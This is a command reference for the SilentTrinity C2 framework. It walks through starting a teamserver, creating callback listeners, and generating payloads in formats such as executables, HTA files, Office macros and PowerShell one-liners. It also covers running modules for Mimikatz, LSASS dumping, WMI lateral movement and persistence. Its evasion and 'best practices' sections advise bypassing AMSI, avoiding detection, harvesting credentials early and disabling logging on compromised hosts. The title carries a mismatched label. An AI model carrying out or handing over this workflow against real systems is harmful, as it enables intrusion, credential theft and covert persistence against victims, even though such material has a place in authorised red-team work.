SilentTrinity (BOFNET)

SilentTrinity is a post-exploitation command-and-control (C2) framework leveraging .NET CLR hosting and IronPython to execute in-memory agents without disk writes. It provides modular payloads, built-in AMSI bypass, and multi-user teamserver capabilities for collaborative red team operations.

Installation

Install SilentTrinity from the official GitHub repository. Requires Python 3.8+ and standard build tools.

# Clone repository
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
cd SILENTTRINITY

# Install Python dependencies
pip install -r requirements.txt

# Alternative: pip install from git
pip install git+https://github.com/byt3bl33d3r/SILENTTRINITY.git

Requirements:

• Python 3.8 or higher
• .NET Framework 3.5+ or .NET Core runtime on target
• IronPython runtime (bundled with agents)
• Msfvenom or manual payload generation tools

Quick Start

Launch the teamserver, generate a stager, and connect the client to begin post-exploitation operations.

# Start teamserver (default: localhost:5000)
python st teamserver 0.0.0.0 5000 [password]

# In another terminal, connect client
python st client wss://attacker-ip:5000 [password]

# Generate HTTP listener payload
st> listeners
st> listeners new http -a 0.0.0.0 -p 8080
st> stagers new http -l <listener_id> -f exe -o /tmp/payload.exe

Architecture

SilentTrinity consists of distributed components: the teamserver manages sessions, the client provides operator interface, stagers generate payloads, and implants execute in-memory via .NET CLR hosting.

Component	Purpose
Teamserver	Central command server, multi-user coordination, session management
Client	Operator interface, connects via WSS (WebSocket Secure)
Stager	Payload generator (exe, dll, hta, macro, powershell, etc)
Implant	.NET CLR hosted agent, IronPython execution engine
Listener	HTTP/HTTPS handler for incoming agent connections
Module	Post-exploitation capability (privesc, lateral move, exfil, etc)

The implant model uses a .NET CLR host to load and execute IronPython runtime, enabling dynamic code execution without traditional PowerShell or cmd.exe calls.

Teamserver

The teamserver is the central command-and-control server managing all connected clients and agents.

# Start teamserver on all interfaces, port 5000
python st teamserver 0.0.0.0 5000 changeme

# Specify custom port
python st teamserver 0.0.0.0 8443 --tls-cert /path/to/cert.pem --tls-key /path/to/key.pem

# List connected clients
st> clients

# View all active sessions
st> sessions

Teamserver Options:

• --tls-cert, --tls-key: Custom SSL/TLS certificates for WSS
• --debug: Enable debug logging
• Multi-user support: Multiple operators connect to single teamserver with shared session visibility

Client

The client connects to the teamserver via secure WebSocket (WSS) and provides an interactive command-line interface.

# Connect to teamserver
python st client wss://10.10.10.50:5000 password123

# Within client session
st> help                    # Show available commands
st> sessions                # List all active sessions
st> sessions -i 1           # Interact with session 1
st> info                    # Display session info

Client Commands:

• listeners — Manage incoming agent handlers
• stagers — Generate payloads
• sessions — List or interact with agents
• modules — Load and execute post-exploitation modules

Listeners

Listeners accept incoming agent connections. Create HTTP or HTTPS listeners for agent callbacks.

# View available listeners
st> listeners

# Create HTTP listener
st> listeners new http -a 0.0.0.0 -p 8080 -n listener1

# Create HTTPS listener
st> listeners new https -a 0.0.0.0 -p 443 -n listener_secure

# Delete listener
st> listeners kill listener1

# Get listener details
st> listeners info <listener_name>

Listener Types:

• HTTP — Standard unencrypted HTTP callback (development only)
• HTTPS — Encrypted TLS callback (recommended for operations)

Stagers

Stagers generate payloads in multiple formats for different delivery methods and target environments.

# List available stagers
st> stagers

# Generate EXE payload
st> stagers new http -l listener1 -f exe -o payload.exe

# Generate DLL payload
st> stagers new http -l listener1 -f dll -o payload.dll

# Generate HTA payload
st> stagers new http -l listener1 -f hta -o payload.hta

# Generate macro (Office VBA)
st> stagers new http -l listener1 -f macro

# Generate MSBuild XML
st> stagers new http -l listener1 -f msbuild -o payload.xml

# Generate PowerShell oneliner
st> stagers new http -l listener1 -f powershell

Supported Formats:

• exe — Executable file
• dll — Dynamic Link Library
• hta — HTML Application
• macro — Office VBA macro
• msbuild — MSBuild XML project
• cscript — Windows Script Host (cscript)
• wscript — Windows Script Host (wscript)
• powershell — PowerShell oneliner

Sessions

Sessions represent compromised targets running the SilentTrinity implant. Interact with sessions to execute modules and issue commands.

# List all sessions
st> sessions

# Interact with session
st> sessions -i 1

# Within session context
st(session_1)> info              # Display session information
st(session_1)> pwd               # Current working directory
st(session_1)> whoami            # Current user
st(session_1)> hostname          # Target hostname
st(session_1)> ipconfig          # Network configuration
st(session_1)> kill              # Terminate session

Session Info Fields:

• User/Domain/Hostname — Target identity
• Process ID — Host process
• Integrity Level — Admin/Medium/Low
• OS Version — Windows version

Modules

Modules are post-exploitation capabilities loaded into active sessions. Browse available modules and execute them against targets.

# List all modules
st(session_1)> modules

# Load specific module
st(session_1)> modules load collection/netsession_enum

# Execute module
st(session_1)> modules execute

# View module details
st(session_1)> modules info <module_path>

# List modules by category
st(session_1)> modules load collection/*

Module Categories:

• collection — Data exfiltration, screenshots, clipboard, keylogging
• credentials — Credential harvesting, vault access, LSASS dumping
• execution — Command execution, code injection, shellcode
• lateral_movement — WMI, PsExec, Pass-the-Hash lateral exploitation
• persistence — Registry, scheduled tasks, COM hijacking
• privesc — UAC bypass, privilege escalation exploits
• situational_awareness — Reconnaissance, enumeration, mapping

Key Modules

Critical modules for post-exploitation workflows:

# Credential extraction via Mimikatz (built-in .NET)
st(session_1)> modules load credentials/mimikatz
st(session_1)> modules execute

# PowerShell execution via CLR hosting (no powershell.exe)
st(session_1)> modules load execution/powershell_clr
st(session_1)> modules execute

# Assembly loading and execution
st(session_1)> modules load execution/assembly_exec
st(session_1)> modules execute

# LSASS credential dumping
st(session_1)> modules load credentials/lsass_dump
st(session_1)> modules execute

# Lateral movement via WMI
st(session_1)> modules load lateral_movement/wmi_exec
st(session_1)> modules execute

# Persistence via scheduled task
st(session_1)> modules load persistence/scheduled_task
st(session_1)> modules execute

# System enumeration
st(session_1)> modules load situational_awareness/system_enum
st(session_1)> modules execute

AMSI and Evasion

SilentTrinity bypasses Antimalware Scan Interface (AMSI) through in-memory execution via CLR hosting. The implant avoids traditional attack detection vectors.

Built-in Evasion Features:

• In-memory execution — Code runs in .NET CLR, not cmd.exe or PowerShell.exe
• No disk writes — Stagers and modules execute entirely in memory
• IronPython runtime — Dynamic code execution without scripting detections
• CLR hosting — Direct .NET runtime hosting bypasses common hooks
• Obfuscation — Payloads encoded/encrypted, decoded at runtime

Additional Evasion Tactics:

# Use HTTPS listener over HTTP for encrypted callback
st> listeners new https -a 0.0.0.0 -p 443

# Obfuscate stager via code encryption
st> stagers new http -l listener1 -f exe --obfuscate

# Randomize beacon interval
st(session_1)> set beacon_interval 30-60

# Use proxy-aware HTTP callbacks
st(session_1)> set proxy auto

Troubleshooting

Issue	Solution
Listener fails to start	Check port availability (netstat -an), verify permissions, ensure no firewall blocks
Agent won’t callback	Confirm listener IP/port correct in stager, check network routing, verify firewall rules
Module execution fails	Confirm session still active, check module compatibility with .NET version, review logs
WSS connection drops	Verify certificate validity, check network latency, restart teamserver
High memory usage	Disable unnecessary modules, reduce beacon intervals, limit concurrent sessions

Best Practices

Operational Security:

• Always use HTTPS listeners (never HTTP in production)
• Rotate custom certificates for WSS connections
• Use strong, unique teamserver passwords
• Limit teamserver network exposure (firewall rules)
• Monitor session beaconing patterns to avoid detection

Post-Exploitation:

• Establish persistence before executing noisy modules
• Execute credential harvesting early (Mimikatz, LSASS dump)
• Use lateral movement modules after privilege escalation
• Clean up artifacts and remove agents from final targets
• Disable code execution logging on compromised targets

Stability:

• Test stagers in isolated lab environment first
• Verify module compatibility with target .NET version
• Use lower beacon intervals during initial recon, increase for stealth
• Maintain multiple listeners for redundancy

Related Tools

Tool	Purpose
Covenant	C# based C2 framework with similar .NET capabilities
Mythic	Modular C2 framework with flexible architecture
Sliver	Golang based C2 with cross-platform support
Havoc	Modern C2 framework with modular agents
PoshC2	PowerShell based C2 for red teams
Metasploit	Exploitation framework with C2 capabilities
Mimikatz	Windows credential extraction (integrated into ST)
BloodHound	AD enumeration and visualization